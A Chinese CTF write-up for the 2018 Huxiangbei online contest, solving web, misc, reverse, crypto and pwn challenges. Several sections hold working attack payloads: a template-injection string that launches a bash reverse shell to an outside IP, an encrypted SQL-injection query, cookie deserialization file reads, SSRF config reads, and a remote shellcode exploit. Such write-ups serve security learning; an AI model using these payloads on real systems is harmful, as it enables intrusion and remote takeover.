湖湘杯 2018 线上CTF WriteUp

  • A+
所属分类:安全博客

共 15 题,解出 12 题。

比赛平台入口地址:http://hxb.erangelab.com/

Welcome - SingIn - 50pt

关注合天智汇公众号,回复hxb2018获得flag
http://hxb2018.oss-cn-beijing.aliyuncs.com/heetian.jpg

hxb2018{W3lc0me_T0_Hxb2o18}

湖湘杯 2018 线上CTF WriteUp

Web - XmeO - 150pt

管理员的flag在哪里?
47.107.235.223:9990

注册帐号,登录,提交 Todo List,然后点 Show,存在模板注入漏洞

{{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('echo "bash -i >& /dev/tcp/222.85.25.45/5555 0>&1">/tmp/xx1x1') }}

{{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('bash /tmp/xx1x1') }}

拿到 Shell 后全局搜索 Flag,关键词 hxb

Flag: hxb2018{510243761ff63759ed7fe96ca2759e45}

湖湘杯 2018 线上CTF WriteUp

Web - Code Check - 200pt

code check
120.79.246.58:49882

源码 news 目录下 list.php

源码泄漏:http://120.79.246.58:49882/news/list.zip

<?php
header('content-type:text/html;charset=utf-8');
require_once '../config.php';
//解密过程
function decode($data){
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
        mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
        $data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
        mcrypt_generic_deinit($td);
        mcrypt_module_close($td);
        if(substr(trim($data),-7)!=='hxb2018'){
                echo '<script>window.location.href="/index.php";</script>';
        }else{
                return substr(trim($data),0,strlen(trim($data))-7);
        }
}
$id=decode($_GET['id']);
$sql="select id,title,content,time from notice where id=$id";
$info=$link->query($sql);
$arr=$info->fetch_assoc();
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>X公司HR系统V1.0</title>
<style>.body{width:600px;height:500px;margin:0 auto}.title{color:red;height:60px;line-height:60px;font-size:30px;font-weight:700;margin-top:75pt;border-bottom:2px solid red;text-align:center}.content,.title{margin:0 auto;width:600px;display:block}.content{height:30px;line-height:30px;font-size:18px;margin-top:40px;text-align:left;color:#828282}</style>
</head>
<body>
<div class="body">
<div class="title"><?php echo $arr['title']?></div>
<div class="content"><?php echo $arr['content']?></div>
</body>

Encoder

<?php 
function encode($data){
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
        mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
        $da = mcrypt_generic($td,$data);
        mcrypt_generic_deinit($td);
        mcrypt_module_close($td);
        return base64_encode(base64_encode($da));
}

推测注入,id 加密过

http://120.79.246.58:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZ0

databases:
    information_schema,mozhe_discuz_stormgroup,mysql,test

mozhe_discuz_stormgroup:
    notice,notice2,stormgroup_member

notice:
    id,title,content,time

notice2:
    id,title

stormgroup_member:
    id,name,password,status

构造:

var_dump(encode("0 union select 1,(select group_concat(title) from notice2),3,4hxb2018"));
http://120.79.246.58:49882/news/list.php?id=K3hId1N2UVpNcjFENkFja0FtMHdrM0pscGduTzFNZk1uZzVVVVdLK2hjbDVqUTBhOFl6b29YOFA1amZ5R3NUeVZOdDdOZ2luNmZMaXV4bmNRZVd1Yi9CV2hmaGJTbUdJTjJrdndKQjBEam89

Flag: hxb2018{088425ca08783233bbe9d21a3015f5f6}

湖湘杯 2018 线上CTF WriteUp

Web - MyNote - 350pt

Cookie 反序列化

Warning: file_get_contents(./upload/9dd4e461268c8034f5c8564e155c67a6/1.php): failed to open stream: No such file or directory in /var/www/html/views/Views.php on line 65
<?php
$b=array("../../flag.php");
var_dump(serialize($b));
var_dump(base64_encode(serialize($b)));
unserialize(serialize($b));
cookie YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=
PD9waHAKCiRmbGFnID0gImh4YjIwMTh7ODNmMmVhMDBiOTczNWQyYTQ1ZjMxNGJmMmViZmVhZTB9IjsKZWNobyAiZmxhZ3tUaGlzX2ZsYWdfaVNfQV9GNGtlX2ZsYWd9IjsKCg==
<?php

$flag = "hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}";
echo "flag{This_flag_iS_A_F4ke_flag}";

Flag: hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}

Misc - Flow - 200pt

流量取证,这个流量包中隐藏着一些秘密,你能找出来吗?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/flow_6D1210D1307A67E4A428602F722E6803.zip

打开全是 802.11 包

湖湘杯 2018 线上CTF WriteUp

上 aircrack-ng 破解密码

湖湘杯 2018 线上CTF WriteUp

湖湘杯 2018 线上CTF WriteUp

可以知道,SSID 是 ctf,密码是 password1

使用 Wireshark 的自动解密功能

湖湘杯 2018 线上CTF WriteUp

然后过滤器使用 http 即可看到 flag

Flag: flag{H4lf_1s_3n0ugh}

湖湘杯 2018 线上CTF WriteUp

Reverse - HighwayHash64 - 300pt

口算哈希说的就是你吧~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/reverse_1CE475F54D2A3264A8ED743FDFEF24A8.zip

湖湘杯 2018 线上CTF WriteUp

sub_1400017A0 为 HighwayHash64 摘要计算

flag 格式:hxb2018{xxxxx}

第一个判断,用来验证 flag 的长度,经过爆破,确定 flag 的长度为 19

第二个判断,用来验证 flag 格式内的值,也可以爆破,来确定 flag 格式内的值

需要注意,计算摘要时用到的默认 Key 被修改了

湖湘杯 2018 线上CTF WriteUp

附上 flag 值爆破脚本:

from highwayhash import *
# https://github.com/kpdemetriou/highwayhash-cffi
# you need to modify sources/highwayhash.c

# void HighwayHashReset(const uint64_t key[4], HighwayHashState* state) {
#   state->mul0[0] = 0x1BE6D5D5FE4CCE2Full;
#   state->mul0[1] = 0x24093822299F31D0ull;
#   state->mul0[2] = 0x33198A2E03707344ull;
#   state->mul0[3] = 0x443F6A8885A308D3ull;
#   state->mul1[0] = 0x5BD39E10CB0EF593ull;
#   state->mul1[1] = 0x60ACF169B5F18A8Cull;
#   state->mul1[2] = 0x7E5466CF34E90C6Cull;
#   state->mul1[3] = 0x852821E638D01377ull;
#   state->v0[0] = 0xCF0C0C1ED5EDF3E;
#   state->v0[1] = state->mul0[1] ^ 0x3F3E3D3C3B3A1918ull;
#   state->v0[2] = state->mul0[2] ^ 0x1226252423222121ull;
#   state->v0[3] = state->mul0[3] ^ 0x2F2E2D2C2B2A2928ull;
#   state->v1[0] = state->mul1[0] ^ 0x1312111117161514ull;
#   state->v1[1] = state->mul1[1] ^ 0x3B3A19183F3E3D3Cull;
#   state->v1[2] = state->mul1[2] ^ 0x2322212112262524ull;
#   state->v1[3] = state->mul1[3] ^ 0x2B2A29282F2E2D2Cull;
# }

# and then, run `python3 setup.py install` to build & install it

key = b"\x00" * 32

i=0
while True:
    i+=1
    if i%100000==0: print (i/float(10000000000))
    data=str(i)
    data=data.rjust(10,'0')
    data=bytes(data,'ascii')
    op=highwayhash_64(key, data)
    if op==b'\x5a\x54\x30\x87\xaf\x26\xbe\xe3':
        print (i)
        break

爆破得到 flag 格式内的值,应该是一个时间戳

湖湘杯 2018 线上CTF WriteUp

Flag: hxb2018{1532649708}

Reverse - Replace - 300pt

简单的...密码学~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/Replace_B21DA8B2F172C13764989DF0F99B890A.rar

很简单,直接贴上脚本:

r=[
0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
]
t='2a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6'
flag=''
for i in range(35):
    t1=ord(t[2*i])
    t2=ord(t[2*i+1])
    if t1<48 or t1>57:
        t1-=87
    else:
        t1-=48
    if t2<48 or t2>57:
        t2-=87
    else:
        t2-=48
    t1&=0xff
    t2&=0xff
    tmp=(t1*16+t2)^0x19
    tmp&=0xff
    for j in range(len(r)):
        if r[j]==tmp:
            flag+=chr(j)
            break
print flag

Flag: flag{Th1s_1s_Simple_Rep1ac3_Enc0d3}

Crypto - Common Crypto - 200pt

Please enter your flag
http://hxb2018.oss-cn-beijing.aliyuncs.com/crypto/crypto_3ED9C81B3AD33F8ABEA1984B2B69284A.zip

AES 算法,挺简单的。

直接贴脚本:

from Crypto.Cipher import AES

enc='461559ceb56d277df44a31ae89f08a6a33626430326635343563373032383031'.decode('hex')
key='\x1B\x2E\x35\x46\x58\x6E\x72\x86\x9B\xA7\xB5\xC8\xD9\xEF\xFF\x0C'
mode=AES.MODE_ECB
c=AES.new(key,mode,key)
print c.decrypt(enc[:16])+enc[16:]+'}'

Flag: hxb2018{bc69322f3bd02f545c702801}

Reverse - More efficient than JS - 300pt

蓝色的火狐和黄色的谷歌更配哦~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/attach_9550FD3DD9774159E9955E2A0E389842.zip

wasm 文件逆向,可以用 wasmdec 生成伪 c 代码

然后人工分析,可以逆出验证部分的代码

附上解密脚本:

mem_data=[
    0xdf, 0x81, 0x7f, 0x20, 0x07, 0xc4, 0x0d, 0x1c, 0xc9, 0x9e, 0x8e, 0x17, 
    0xd7, 0xed, 0x78, 0x50, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x20, 0x69, 0x6e, 
    0x70, 0x75, 0x74, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x66, 0x6c, 0x61, 
    0x67, 0x3a, 0x0a, 0x00, 0x25, 0x73, 0x00, 0x49, 0x5f, 0x61, 0x6d, 0x5f, 
    0x6b, 0x65, 0x79, 0x00, 0x79, 0x65, 0x73, 0x00, 0x6e, 0x6f, 0x00, 0x69, 
    0x6e, 0x66, 0x69, 0x6e, 0x69, 0x74, 0x79, 0x00, 0x00, 0x01, 0x02, 0x04, 
    0x07, 0x03, 0x06, 0x05, 0x00, 0x2d, 0x2b, 0x20, 0x20, 0x20, 0x30, 0x58, 
    0x30, 0x78, 0x00, 0x28, 0x6e, 0x75, 0x6c, 0x6c, 0x29, 0x00, 0x2d, 0x30, 
    0x58, 0x2b, 0x30, 0x58, 0x20, 0x30, 0x58, 0x2d, 0x30, 0x78, 0x2b, 0x30, 
    0x78, 0x20, 0x30, 0x78, 0x00, 0x69, 0x6e, 0x66, 0x00, 0x49, 0x4e, 0x46, 
    0x00, 0x6e, 0x61, 0x6e, 0x00, 0x4e, 0x41, 0x4e, 0x00, 0x2e, 
]
mem=''
for i in mem_data:
    mem+=chr(i)
key=mem[4475-1024-3408:4475-1024-3408+8]
enc=mem[4432-1024-3408:4432-1024-3408+15]
print key
print enc.encode('hex')

table1=[]
table2=[]

for i in range(256):
    table1.append(i)
    table2.append(ord(key[i%8]))

tmp=0
for i in range(256):
    tmp=(tmp+table1[i]+table2[i])&0xff
    table1[i],table1[tmp]=table1[tmp],table1[i]

flag=''
tmp=0
for i in range(len(enc)):
    c=(i+1)&0xff
    tmp=(tmp+table1[c])&0xff
    table1[c],table1[tmp]=table1[tmp],table1[c]
    flag+=chr(ord(enc[i])^table1[(table1[c]+table1[tmp])&0xff])
print flag

Flag: flag{happy_rc4}

PWN - Regex Format - 350pt

关键点在正则匹配的时候,&s 在栈上可溢出,直接在 bss 写 shellcode ,然后 ROP

贴一下POC:

from pwn import *

#io=process('./pwn1')
io=remote('47.107.172.28',8888)
payload=':a\x08\x04\xa3\x50$*'
io.sendafter('format\n',payload)

shellcode='\x90'*5
shellcode+='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload='Before use it, understand it first.'
payload+='a'*0xd8+p32(0x804a350)+shellcode
io.sendafter('match\n',payload)
print io.sendlineafter('[Y/n]\n','n')

io.interactive()

Flag: hxb2018{214ebb03581966cf32cc351dd233e7fc}

Web - Readflag - 250pt

拿到题,网页提示用 url 参数来 ssrf

湖湘杯 2018 线上CTF WriteUp

查看 header,看到是 apache,直接读配置文件

湖湘杯 2018 线上CTF WriteUp

看到网站根目录下的 php 文件,继续读

湖湘杯 2018 线上CTF WriteUp

源代码里在某个条件下,可以调用 readflag 文件,进而读到 flag

那么直接把 readflag 文件下载下来,逆向一下

湖湘杯 2018 线上CTF WriteUp

可以看到 flag 文件就叫 flag,直接读出来

湖湘杯 2018 线上CTF WriteUp

Flag: hxb2018{0ef0c0d15f1a22b47af2a01669fbf124}

Misc - Disk - 200pt

磁盘隐写,这个磁盘上隐藏着一些秘密,你能找出来吗?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/disk_95ED58BC6E172FABFEE602D4513E2BE7.zip

一个 vmdk 文件,看了一下里面是 NTFS 格式,可以用 RecuperaBit 来分析

分析命令如下:

python main.py ctf-flat.vmdk
[ENTER]
recoverable
tree 0

可以看到有 flag0.txt / flag1.txt / flag2.txt / flag3.txt 4个文件,里面都写着 flag is not here.

另外还能看到,这四个文件有 ads 流,所以隐藏数据应该在这里

用下面的命令逐个导出:

restore 0 33:ads
restore 0 34:ads
restore 0 35:ads
restore 0 36:ads

在默认输出 recuperabit_output 文件夹里可以看到,四个已经导出的 ads 流文件

4 个文件里都是 10 组成的二进制字符,将 4 个文件里的内容顺序拼接,然后二进制转换成字符串,就能得到 flag 了

Flag: flag{4DS_1n_D1sk}

Source: impakho.com | Author:impakho

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: